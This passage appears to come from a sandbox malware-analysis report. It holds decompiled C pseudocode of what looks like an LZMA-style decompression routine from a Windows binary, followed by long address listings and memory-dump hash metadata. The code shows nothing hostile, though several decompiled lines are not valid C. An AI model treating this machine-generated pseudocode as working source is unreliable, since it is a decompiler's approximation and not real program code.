                                                            													 *(__ebp - 0x50) = 1;
                                                            													 *(__ebp - 0x44) = 0;
                                                            													 *(__ebp - 0x48) = 0;
                                                            													L112:
                                                            													__eax =  *(__ebp - 0x40);
                                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                            														_t391 = __ebp - 0x2c;
                                                            														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                            														__eflags =  *_t391;
                                                            														goto L119;
                                                            													}
                                                            													__eax =  *(__ebp - 0x50);
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            													__eax =  *(__ebp - 0x58);
                                                            													__esi = __edi + __eax;
                                                            													 *(__ebp - 0x54) = __esi;
                                                            													__ax =  *__esi;
                                                            													__ecx = __ax & 0x0000ffff;
                                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                                            													if( *(__ebp - 0xc) >= __edx) {
                                                            														__ecx = 0;
                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                            														__ecx = 1;
                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                            														__ebx = 1;
                                                            														__ecx =  *(__ebp - 0x48);
                                                            														__ebx = 1 << __cl;
                                                            														__ecx = 1 << __cl;
                                                            														__ebx =  *(__ebp - 0x44);
                                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                                            														__cx = __ax;
                                                            														__cx = __ax >> 5;
                                                            														__eax = __eax - __ecx;
                                                            														__edi = __edi + 1;
                                                            														__eflags = __edi;
                                                            														 *(__ebp - 0x44) = __ebx;
                                                            														 *__esi = __ax;
                                                            														 *(__ebp - 0x50) = __edi;
                                                            													} else {
                                                            														 *(__ebp - 0x10) = __edx;
                                                            														0x800 = 0x800 - __ecx;
                                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            														 *__esi = __dx;
                                                            													}
                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                            														L111:
                                                            														_t368 = __ebp - 0x48;
                                                            														 *_t368 =  *(__ebp - 0x48) + 1;
                                                            														__eflags =  *_t368;
                                                            														goto L112;
                                                            													} else {
                                                            														goto L109;
                                                            													}
                                                            												}
                                                            												__ecx =  *(__ebp - 0xc);
                                                            												__ebx = __ebx + __ebx;
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                            													__ecx =  *(__ebp - 0x10);
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            													__ebx = __ebx | 0x00000001;
                                                            													__eflags = __ebx;
                                                            													 *(__ebp - 0x44) = __ebx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													L101:
                                                            													_t338 = __ebp - 0x48;
                                                            													 *_t338 =  *(__ebp - 0x48) - 1;
                                                            													__eflags =  *_t338;
                                                            													goto L102;
                                                            												} else {
                                                            													goto L99;
                                                            												}
                                                            											}
                                                            											__edx =  *(__ebp - 4);
                                                            											__eax = __eax - __ebx;
                                                            											 *(__ebp - 0x40) = __ecx;
                                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                            											goto L108;
                                                            										case 0x1a:
                                                            											L56:
                                                            											__eflags =  *(__ebp - 0x64);
                                                            											if( *(__ebp - 0x64) == 0) {
                                                            												 *(__ebp - 0x88) = 0x1a;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x68);
                                                            											__al =  *(__ebp - 0x5c);
                                                            											__edx =  *(__ebp - 8);
                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            											 *( *(__ebp - 0x68)) = __al;
                                                            											__ecx =  *(__ebp - 0x14);
                                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                                            											__eax = __ecx + 1;
                                                            											__edx = 0;
                                                            											_t192 = __eax %  *(__ebp - 0x74);
                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                            											__edx = _t192;
                                                            											goto L79;
                                                            										case 0x1b:
                                                            											L75:
                                                            											__eflags =  *(__ebp - 0x64);
                                                            											if( *(__ebp - 0x64) == 0) {
                                                            												 *(__ebp - 0x88) = 0x1b;
                                                            												goto L170;
                                                            											}
                                                            											__eax =  *(__ebp - 0x14);
                                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            											__eflags = __eax -  *(__ebp - 0x74);
                                                            											if(__eax >=  *(__ebp - 0x74)) {
                                                            												__eax = __eax +  *(__ebp - 0x74);
                                                            												__eflags = __eax;
                                                            											}
                                                            											__edx =  *(__ebp - 8);
                                                            											__cl =  *(__eax + __edx);
                                                            											__eax =  *(__ebp - 0x14);
                                                            											 *(__ebp - 0x5c) = __cl;
                                                            											 *(__eax + __edx) = __cl;
                                                            											__eax = __eax + 1;
                                                            											__edx = 0;
                                                            											_t274 = __eax %  *(__ebp - 0x74);
                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                            											__edx = _t274;
                                                            											__eax =  *(__ebp - 0x68);
                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            											_t283 = __ebp - 0x64;
                                                            											 *_t283 =  *(__ebp - 0x64) - 1;
                                                            											__eflags =  *_t283;
                                                            											 *( *(__ebp - 0x68)) = __cl;
                                                            											L79:
                                                            											 *(__ebp - 0x14) = __edx;
                                                            											goto L80;
                                                            										case 0x1c:
                                                            											while(1) {
                                                            												L123:
                                                            												__eflags =  *(__ebp - 0x64);
                                                            												if( *(__ebp - 0x64) == 0) {
                                                            													break;
                                                            												}
                                                            												__eax =  *(__ebp - 0x14);
                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                            													__eflags = __eax;
                                                            												}
                                                            												__edx =  *(__ebp - 8);
                                                            												__cl =  *(__eax + __edx);
                                                            												__eax =  *(__ebp - 0x14);
                                                            												 *(__ebp - 0x5c) = __cl;
                                                            												 *(__eax + __edx) = __cl;
                                                            												__eax = __eax + 1;
                                                            												__edx = 0;
                                                            												_t414 = __eax %  *(__ebp - 0x74);
                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                            												__edx = _t414;
                                                            												__eax =  *(__ebp - 0x68);
                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                            												__eflags =  *(__ebp - 0x30);
                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                            												 *(__ebp - 0x14) = _t414;
                                                            												if( *(__ebp - 0x30) > 0) {
                                                            													continue;
                                                            												} else {
                                                            													L80:
                                                            													 *(__ebp - 0x88) = 2;
                                                            													goto L1;
                                                            												}
                                                            											}
                                                            											 *(__ebp - 0x88) = 0x1c;
                                                            											goto L170;
                                                            									}
                                                            								}
                                                            								L171:
                                                            								_t535 = _t534 | 0xffffffff;
                                                            								goto L172;
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}













                                                            0x00000000
                                                            0x004065c1
                                                            0x004065c1
                                                            0x004065c5
                                                            0x004065ee
                                                            0x004065f8
                                                            0x004065c7
                                                            0x004065d0
                                                            0x004065dd
                                                            0x004065e0
                                                            0x00406924
                                                            0x00406924
                                                            0x00406927
                                                            0x00406927
                                                            0x00406927
                                                            0x0040692d
                                                            0x00406933
                                                            0x00406939
                                                            0x00406953
                                                            0x00406956
                                                            0x0040695c
                                                            0x00406967
                                                            0x00406969
                                                            0x0040693b
                                                            0x0040693b
                                                            0x0040694a
                                                            0x0040694e
                                                            0x0040694e
                                                            0x00406973
                                                            0x00000000
                                                            0x00000000
                                                            0x00406975
                                                            0x00406979
                                                            0x00406b28
                                                            0x00406b3e
                                                            0x00406b46
                                                            0x00406b4d
                                                            0x00406b4f
                                                            0x00406b56
                                                            0x00406b5a
                                                            0x00406b5a
                                                            0x00406985
                                                            0x0040698c
                                                            0x00406994
                                                            0x00406997
                                                            0x0040699a
                                                            0x0040699a
                                                            0x004069a0
                                                            0x004069a0
                                                            0x0040613c
                                                            0x0040613c
                                                            0x0040613c
                                                            0x00406145
                                                            0x00000000
                                                            0x00000000
                                                            0x0040614b
                                                            0x00000000
                                                            0x00406156
                                                            0x00000000
                                                            0x00000000
                                                            0x0040615f
                                                            0x00406162
                                                            0x00406165
                                                            0x00406169
                                                            0x00000000
                                                            0x00000000
                                                            0x0040616f
                                                            0x00406172
                                                            0x00406174
                                                            0x00406175
                                                            0x00406178
                                                            0x0040617a
                                                            0x0040617b
                                                            0x0040617d
                                                            0x00406180
                                                            0x00406185
                                                            0x0040618a
                                                            0x00406193
                                                            0x004061a6
                                                            0x004061a9
                                                            0x004061b5
                                                            0x004061dd
                                                            0x004061df
                                                            0x004061ed
                                                            0x004061ed
                                                            0x004061f1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004061e1
                                                            0x004061e1
                                                            0x004061e4
                                                            0x004061e5
                                                            0x004061e5
                                                            0x00000000
                                                            0x004061e1
                                                            0x004061bb
                                                            0x004061c0
                                                            0x004061c0
                                                            0x004061c9
                                                            0x004061d1
                                                            0x004061d4
                                                            0x00000000
                                                            0x004061da
                                                            0x004061da
                                                            0x00000000
                                                            0x004061da
                                                            0x00000000
                                                            0x004061f7
                                                            0x004061f7
                                                            0x004061fb
                                                            0x00406aa7
                                                            0x00000000
                                                            0x00406aa7
                                                            0x00406204
                                                            0x00406214
                                                            0x00406217
                                                            0x0040621a
                                                            0x0040621a
                                                            0x0040621a
                                                            0x0040621d
                                                            0x00406221
                                                            0x00000000
                                                            0x00000000
                                                            0x00406223
                                                            0x00406229
                                                            0x00406253
                                                            0x00406259
                                                            0x00406260
                                                            0x00000000
                                                            0x00406260
                                                            0x0040622f
                                                            0x00406232
                                                            0x00406237
                                                            0x00406237
                                                            0x00406242
                                                            0x0040624a
                                                            0x0040624d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406292
                                                            0x00406298
                                                            0x0040629b
                                                            0x004062a8
                                                            0x004062b0
                                                            0x00406924
                                                            0x00000000
                                                            0x00000000
                                                            0x00406267
                                                            0x00406267
                                                            0x0040626b
                                                            0x00406ab6
                                                            0x00000000
                                                            0x00406ab6
                                                            0x00406277
                                                            0x00406282
                                                            0x00406282
                                                            0x00406282
                                                            0x00406285
                                                            0x00406288
                                                            0x0040628b
                                                            0x00406290
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406927
                                                            0x00406927
                                                            0x0040692d
                                                            0x00406933
                                                            0x00406939
                                                            0x00406953
                                                            0x00406956
                                                            0x0040695c
                                                            0x00406967
                                                            0x00406969
                                                            0x0040693b
                                                            0x0040693b
                                                            0x0040694a
                                                            0x0040694e
                                                            0x0040694e
                                                            0x00406973
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004062b8
                                                            0x004062ba
                                                            0x004062bd
                                                            0x0040632e
                                                            0x00406331
                                                            0x00406334
                                                            0x0040633b
                                                            0x00406345
                                                            0x00406924
                                                            0x00406924
                                                            0x00000000
                                                            0x00406924
                                                            0x00406924
                                                            0x004062bf
                                                            0x004062c3
                                                            0x004062c6
                                                            0x004062c8
                                                            0x004062cb
                                                            0x004062ce
                                                            0x004062d0
                                                            0x004062d3
                                                            0x004062d5
                                                            0x004062da
                                                            0x004062dd
                                                            0x004062e0
                                                            0x004062e4
                                                            0x004062eb
                                                            0x004062ee
                                                            0x004062f5
                                                            0x004062f9
                                                            0x00406301
                                                            0x00406301
                                                            0x00406301
                                                            0x004062fb
                                                            0x004062fb
                                                            0x004062fb
                                                            0x004062f0
                                                            0x004062f0
                                                            0x004062f0
                                                            0x00406305
                                                            0x00406308
                                                            0x00406326
                                                            0x00406328
                                                            0x00000000
                                                            0x0040630a
                                                            0x0040630a
                                                            0x0040630d
                                                            0x00406310
                                                            0x00406313
                                                            0x00406315
                                                            0x00406315
                                                            0x00406315
                                                            0x00406318
                                                            0x0040631b
                                                            0x0040631d
                                                            0x0040631e
                                                            0x00406321
                                                            0x00000000
                                                            0x00406321
                                                            0x00000000
                                                            0x00406557
                                                            0x0040655b
                                                            0x00406579
                                                            0x0040657c
                                                            0x00406583
                                                            0x00406586
                                                            0x00406589
                                                            0x0040658c
                                                            0x0040658f
                                                            0x00406592
                                                            0x00406594
                                                            0x0040659b
                                                            0x0040659c
                                                            0x0040659e
                                                            0x004065a1
                                                            0x004065a4
                                                            0x004065a7
                                                            0x004065a7
                                                            0x004065ac
                                                            0x00000000
                                                            0x004065ac
                                                            0x0040655d
                                                            0x00406560
                                                            0x00406563
                                                            0x0040656d
                                                            0x00406924
                                                            0x00406924
                                                            0x00000000
                                                            0x00406924
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406604
                                                            0x00406608
                                                            0x00000000
                                                            0x00000000
                                                            0x0040660e
                                                            0x00406612
                                                            0x00000000
                                                            0x00000000
                                                            0x00406618
                                                            0x0040661a
                                                            0x0040661e
                                                            0x0040661e
                                                            0x00406621
                                                            0x00406625
                                                            0x00000000
                                                            0x00000000
                                                            0x00406675
                                                            0x00406679
                                                            0x00406680
                                                            0x00406683
                                                            0x00406686
                                                            0x00406690
                                                            0x00406924
                                                            0x00406924
                                                            0x00000000
                                                            0x00406924
                                                            0x00406924
                                                            0x0040667b
                                                            0x00000000
                                                            0x00000000
                                                            0x0040669c
                                                            0x004066a0
                                                            0x004066a7
                                                            0x004066aa
                                                            0x004066ad
                                                            0x004066a2
                                                            0x004066a2
                                                            0x004066a2
                                                            0x004066b0
                                                            0x004066b3
                                                            0x004066b6
                                                            0x004066b6
                                                            0x004066b9
                                                            0x004066bc
                                                            0x004066bf
                                                            0x004066bf
                                                            0x004066c2
                                                            0x004066c9
                                                            0x004066ce
                                                            0x00000000
                                                            0x00000000
                                                            0x0040675c
                                                            0x0040675c
                                                            0x00406760
                                                            0x00406afe
                                                            0x00000000
                                                            0x00406afe
                                                            0x00406766
                                                            0x00406769
                                                            0x0040676c
                                                            0x00406770
                                                            0x00406773
                                                            0x00406779
                                                            0x0040677b
                                                            0x0040677b
                                                            0x0040677b
                                                            0x0040677e
                                                            0x00406781
                                                            0x00000000
                                                            0x00000000
                                                            0x00406351
                                                            0x00406351
                                                            0x00406355
                                                            0x00406ac2
                                                            0x00000000
                                                            0x00406ac2
                                                            0x0040635b
                                                            0x0040635e
                                                            0x00406361
                                                            0x00406365
                                                            0x00406368
                                                            0x0040636e
                                                            0x00406370
                                                            0x00406370
                                                            0x00406370
                                                            0x00406373
                                                            0x00406376
                                                            0x00406376
                                                            0x00406379
                                                            0x0040637c
                                                            0x00000000
                                                            0x00000000
                                                            0x00406382
                                                            0x00406388
                                                            0x00000000
                                                            0x00000000
                                                            0x0040638e
                                                            0x0040638e
                                                            0x00406392
                                                            0x00406395
                                                            0x00406398
                                                            0x0040639b
                                                            0x0040639e
                                                            0x0040639f
                                                            0x004063a2
                                                            0x004063a4
                                                            0x004063aa
                                                            0x004063ad
                                                            0x004063b0
                                                            0x004063b3
                                                            0x004063b6
                                                            0x004063b9
                                                            0x004063bc
                                                            0x004063d8
                                                            0x004063db
                                                            0x004063de
                                                            0x004063e1
                                                            0x004063e8
                                                            0x004063ec
                                                            0x004063ee
                                                            0x004063f2
                                                            0x004063be
                                                            0x004063be
                                                            0x004063c2
                                                            0x004063ca
                                                            0x004063cf
                                                            0x004063d1
                                                            0x004063d3
                                                            0x004063d3
                                                            0x004063f5
                                                            0x004063fc
                                                            0x004063ff
                                                            0x00000000
                                                            0x00406405
                                                            0x00000000
                                                            0x00406405
                                                            0x00000000
                                                            0x0040640a
                                                            0x0040640a
                                                            0x0040640e
                                                            0x00406ace
                                                            0x00000000
                                                            0x00406ace
                                                            0x00406414
                                                            0x00406417
                                                            0x0040641a
                                                            0x0040641e
                                                            0x00406421
                                                            0x00406427
                                                            0x00406429
                                                            0x00406429
                                                            0x00406429
                                                            0x0040642c
                                                            0x0040642f
                                                            0x0040642f
                                                            0x0040642f
                                                            0x00406435
                                                            0x00000000
                                                            0x00000000
                                                            0x00406437
                                                            0x0040643a
                                                            0x0040643d
                                                            0x00406440
                                                            0x00406443
                                                            0x00406446
                                                            0x00406449
                                                            0x0040644c
                                                            0x0040644f
                                                            0x00406452
                                                            0x00406455
                                                            0x0040646d
                                                            0x00406470
                                                            0x00406473
                                                            0x00406476
                                                            0x00406476
                                                            0x00406479
                                                            0x0040647d
                                                            0x0040647f
                                                            0x00406457
                                                            0x00406457
                                                            0x0040645f
                                                            0x00406464
                                                            0x00406466
                                                            0x00406468
                                                            0x00406468
                                                            0x00406482
                                                            0x00406489
                                                            0x0040648c
                                                            0x00000000
                                                            0x0040648e
                                                            0x00000000
                                                            0x0040648e
                                                            0x0040648c
                                                            0x00406493
                                                            0x00406493
                                                            0x00406493
                                                            0x00406493
                                                            0x00000000
                                                            0x00000000
                                                            0x004064ce
                                                            0x004064ce
                                                            0x004064d2
                                                            0x00406ada
                                                            0x00000000
                                                            0x00406ada
                                                            0x004064d8
                                                            0x004064db
                                                            0x004064de
                                                            0x004064e2
                                                            0x004064e5
                                                            0x004064eb
                                                            0x004064ed
                                                            0x004064ed
                                                            0x004064ed
                                                            0x004064f0
                                                            0x004064f3
                                                            0x004064f3
                                                            0x004064f9
                                                            0x00406497
                                                            0x00406497
                                                            0x0040649a
                                                            0x00000000
                                                            0x0040649a
                                                            0x004064fb
                                                            0x004064fb
                                                            0x004064fe
                                                            0x00406501
                                                            0x00406504
                                                            0x00406507
                                                            0x0040650a
                                                            0x0040650d
                                                            0x00406510
                                                            0x00406513
                                                            0x00406516
                                                            0x00406519
                                                            0x00406531
                                                            0x00406534
                                                            0x00406537
                                                            0x0040653a
                                                            0x0040653a
                                                            0x0040653d
                                                            0x00406541
                                                            0x00406543
                                                            0x0040651b
                                                            0x0040651b
                                                            0x00406523
                                                            0x00406528
                                                            0x0040652a
                                                            0x0040652c
                                                            0x0040652c
                                                            0x00406546
                                                            0x0040654d
                                                            0x00406550
                                                            0x00000000
                                                            0x00406552
                                                            0x00000000
                                                            0x00406552
                                                            0x00000000
                                                            0x004067df
                                                            0x004067df
                                                            0x004067e3
                                                            0x00406b0a
                                                            0x00000000
                                                            0x00406b0a
                                                            0x004067e9
                                                            0x004067ec
                                                            0x004067ef
                                                            0x004067f3
                                                            0x004067f6
                                                            0x004067fc
                                                            0x004067fe
                                                            0x004067fe
                                                            0x004067fe
                                                            0x00406801
                                                            0x00000000
                                                            0x00000000
                                                            0x004065af
                                                            0x004065af
                                                            0x004065b2
                                                            0x00406924
                                                            0x00406924
                                                            0x00000000
                                                            0x00406924
                                                            0x00000000
                                                            0x004068ee
                                                            0x004068f2
                                                            0x00406914
                                                            0x00406917
                                                            0x00406921
                                                            0x00406924
                                                            0x00406924
                                                            0x00000000
                                                            0x00406924
                                                            0x00406924
                                                            0x004068f4
                                                            0x004068f7
                                                            0x004068fb
                                                            0x004068fe
                                                            0x004068fe
                                                            0x00406901
                                                            0x00000000
                                                            0x00000000
                                                            0x004069ab
                                                            0x004069af
                                                            0x004069cd
                                                            0x004069cd
                                                            0x004069cd
                                                            0x004069d4
                                                            0x004069db
                                                            0x004069e2
                                                            0x004069e2
                                                            0x00000000
                                                            0x004069e2
                                                            0x004069b1
                                                            0x004069b4
                                                            0x004069b7
                                                            0x004069ba
                                                            0x004069c1
                                                            0x00406905
                                                            0x00406905
                                                            0x00406908
                                                            0x00000000
                                                            0x00000000
                                                            0x00406a9c
                                                            0x00406a9f
                                                            0x004069a0
                                                            0x00000000
                                                            0x00000000
                                                            0x004066d6
                                                            0x004066d8
                                                            0x004066df
                                                            0x004066e0
                                                            0x004066e2
                                                            0x004066e5
                                                            0x00000000
                                                            0x00000000
                                                            0x004066ed
                                                            0x004066f0
                                                            0x004066f3
                                                            0x004066f5
                                                            0x004066f7
                                                            0x004066f7
                                                            0x004066f8
                                                            0x004066fb
                                                            0x00406702
                                                            0x00406705
                                                            0x00406713
                                                            0x00000000
                                                            0x00000000
                                                            0x004069e9
                                                            0x004069e9
                                                            0x004069ec
                                                            0x004069f3
                                                            0x00000000
                                                            0x00000000
                                                            0x004069f8
                                                            0x004069f8
                                                            0x004069fc
                                                            0x00406b34
                                                            0x00000000
                                                            0x00406b34
                                                            0x00406a02
                                                            0x00406a05
                                                            0x00406a08
                                                            0x00406a0c
                                                            0x00406a0f
                                                            0x00406a15
                                                            0x00406a17
                                                            0x00406a17
                                                            0x00406a17
                                                            0x00406a1a
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a20
                                                            0x00406a20
                                                            0x00406a24
                                                            0x00406a84
                                                            0x00406a87
                                                            0x00406a8c
                                                            0x00406a8d
                                                            0x00406a8f
                                                            0x00406a91
                                                            0x00406a94
                                                            0x004069a0
                                                            0x004069a0
                                                            0x00000000
                                                            0x004069a6
                                                            0x004069a0
                                                            0x00406a26
                                                            0x00406a2c
                                                            0x00406a2f
                                                            0x00406a32
                                                            0x00406a35
                                                            0x00406a38
                                                            0x00406a3b
                                                            0x00406a3e
                                                            0x00406a41
                                                            0x00406a44
                                                            0x00406a47
                                                            0x00406a60
                                                            0x00406a63
                                                            0x00406a66
                                                            0x00406a69
                                                            0x00406a6d
                                                            0x00406a6f
                                                            0x00406a6f
                                                            0x00406a70
                                                            0x00406a73
                                                            0x00406a49
                                                            0x00406a49
                                                            0x00406a51
                                                            0x00406a56
                                                            0x00406a58
                                                            0x00406a5b
                                                            0x00406a5b
                                                            0x00406a76
                                                            0x00406a7d
                                                            0x00000000
                                                            0x00406a7f
                                                            0x00000000
                                                            0x00406a7f
                                                            0x00000000
                                                            0x0040671b
                                                            0x0040671e
                                                            0x00406754
                                                            0x00406884
                                                            0x00406884
                                                            0x00406884
                                                            0x00406884
                                                            0x00406887
                                                            0x00406887
                                                            0x0040688a
                                                            0x0040688c
                                                            0x00406b16
                                                            0x00000000
                                                            0x00406b16
                                                            0x00406892
                                                            0x00406895
                                                            0x00000000
                                                            0x00000000
                                                            0x0040689b
                                                            0x0040689f
                                                            0x004068a2
                                                            0x004068a2
                                                            0x004068a2
                                                            0x00000000
                                                            0x004068a2
                                                            0x00406720
                                                            0x00406722
                                                            0x00406724
                                                            0x00406726
                                                            0x00406729
                                                            0x0040672a
                                                            0x0040672c
                                                            0x0040672e
                                                            0x00406731
                                                            0x00406734
                                                            0x0040674a
                                                            0x0040674f
                                                            0x00406787
                                                            0x00406787
                                                            0x0040678b
                                                            0x004067b7
                                                            0x004067b9
                                                            0x004067c0
                                                            0x004067c3
                                                            0x004067c6
                                                            0x004067c6
                                                            0x004067cb
                                                            0x004067cb
                                                            0x004067cd
                                                            0x004067d0
                                                            0x004067d7
                                                            0x004067da
                                                            0x00406807
                                                            0x00406807
                                                            0x0040680a
                                                            0x0040680d
                                                            0x00406881
                                                            0x00406881
                                                            0x00406881
                                                            0x00000000
                                                            0x00406881
                                                            0x0040680f
                                                            0x00406815
                                                            0x00406818
                                                            0x0040681b
                                                            0x0040681e
                                                            0x00406821
                                                            0x00406824
                                                            0x00406827
                                                            0x0040682a
                                                            0x0040682d
                                                            0x00406830
                                                            0x00406849
                                                            0x0040684b
                                                            0x0040684e
                                                            0x0040684f
                                                            0x00406852
                                                            0x00406854
                                                            0x00406857
                                                            0x00406859
                                                            0x0040685b
                                                            0x0040685e
                                                            0x00406860
                                                            0x00406863
                                                            0x00406867
                                                            0x00406869
                                                            0x00406869
                                                            0x0040686a
                                                            0x0040686d
                                                            0x00406870
                                                            0x00406832
                                                            0x00406832
                                                            0x0040683a
                                                            0x0040683f
                                                            0x00406841
                                                            0x00406844
                                                            0x00406844
                                                            0x00406873
                                                            0x0040687a
                                                            0x00406804
                                                            0x00406804
                                                            0x00406804
                                                            0x00406804
                                                            0x00000000
                                                            0x0040687c
                                                            0x00000000
                                                            0x0040687c
                                                            0x0040687a
                                                            0x0040678d
                                                            0x00406790
                                                            0x00406792
                                                            0x00406795
                                                            0x00406798
                                                            0x0040679b
                                                            0x0040679d
                                                            0x004067a0
                                                            0x004067a3
                                                            0x004067a3
                                                            0x004067a6
                                                            0x004067a6
                                                            0x004067a9
                                                            0x004067b0
                                                            0x00406784
                                                            0x00406784
                                                            0x00406784
                                                            0x00406784
                                                            0x00000000
                                                            0x004067b2
                                                            0x00000000
                                                            0x004067b2
                                                            0x004067b0
                                                            0x00406736
                                                            0x00406739
                                                            0x0040673b
                                                            0x0040673e
                                                            0x00000000
                                                            0x00000000
                                                            0x0040649d
                                                            0x0040649d
                                                            0x004064a1
                                                            0x00406ae6
                                                            0x00000000
                                                            0x00406ae6
                                                            0x004064a7
                                                            0x004064aa
                                                            0x004064ad
                                                            0x004064b0
                                                            0x004064b3
                                                            0x004064b6
                                                            0x004064b9
                                                            0x004064bb
                                                            0x004064be
                                                            0x004064c1
                                                            0x004064c4
                                                            0x004064c6
                                                            0x004064c6
                                                            0x004064c6
                                                            0x00000000
                                                            0x00000000
                                                            0x00406628
                                                            0x00406628
                                                            0x0040662c
                                                            0x00406af2
                                                            0x00000000
                                                            0x00406af2
                                                            0x00406632
                                                            0x00406635
                                                            0x00406638
                                                            0x0040663b
                                                            0x0040663d
                                                            0x0040663d
                                                            0x0040663d
                                                            0x00406640
                                                            0x00406643
                                                            0x00406646
                                                            0x00406649
                                                            0x0040664c
                                                            0x0040664f
                                                            0x00406650
                                                            0x00406652
                                                            0x00406652
                                                            0x00406652
                                                            0x00406655
                                                            0x00406658
                                                            0x0040665b
                                                            0x0040665e
                                                            0x0040665e
                                                            0x0040665e
                                                            0x00406661
                                                            0x00406663
                                                            0x00406663
                                                            0x00000000
                                                            0x00000000
                                                            0x004068a5
                                                            0x004068a5
                                                            0x004068a5
                                                            0x004068a9
                                                            0x00000000
                                                            0x00000000
                                                            0x004068af
                                                            0x004068b2
                                                            0x004068b5
                                                            0x004068b8
                                                            0x004068ba
                                                            0x004068ba
                                                            0x004068ba
                                                            0x004068bd
                                                            0x004068c0
                                                            0x004068c3
                                                            0x004068c6
                                                            0x004068c9
                                                            0x004068cc
                                                            0x004068cd
                                                            0x004068cf
                                                            0x004068cf
                                                            0x004068cf
                                                            0x004068d2
                                                            0x004068d5
                                                            0x004068d8
                                                            0x004068db
                                                            0x004068de
                                                            0x004068e2
                                                            0x004068e4
                                                            0x004068e7
                                                            0x00000000
                                                            0x004068e9
                                                            0x00406666
                                                            0x00406666
                                                            0x00000000
                                                            0x00406666
                                                            0x004068e7
                                                            0x00406b1c
                                                            0x00000000
                                                            0x00000000
                                                            0x0040614b
                                                            0x00406b53
                                                            0x00406b53
                                                            0x00000000
                                                            0x00406b53
                                                            0x004069a0
                                                            0x00406927
                                                            0x00406924

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1ead19a7d6b18f14945d6ecc7a756aa80631c696357f52aa6e4b7da038a1b463
                                                            • Instruction ID: a58d0c8a3e5e471a1862abd912d582b465d9d5205f6115614135299ff5c3e34f
                                                            • Opcode Fuzzy Hash: 1ead19a7d6b18f14945d6ecc7a756aa80631c696357f52aa6e4b7da038a1b463
                                                            • Instruction Fuzzy Hash: F9714771E00229CBDF28CF98C8447ADBBB1FF44305F15806AD816BB281D7789956DF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 93%
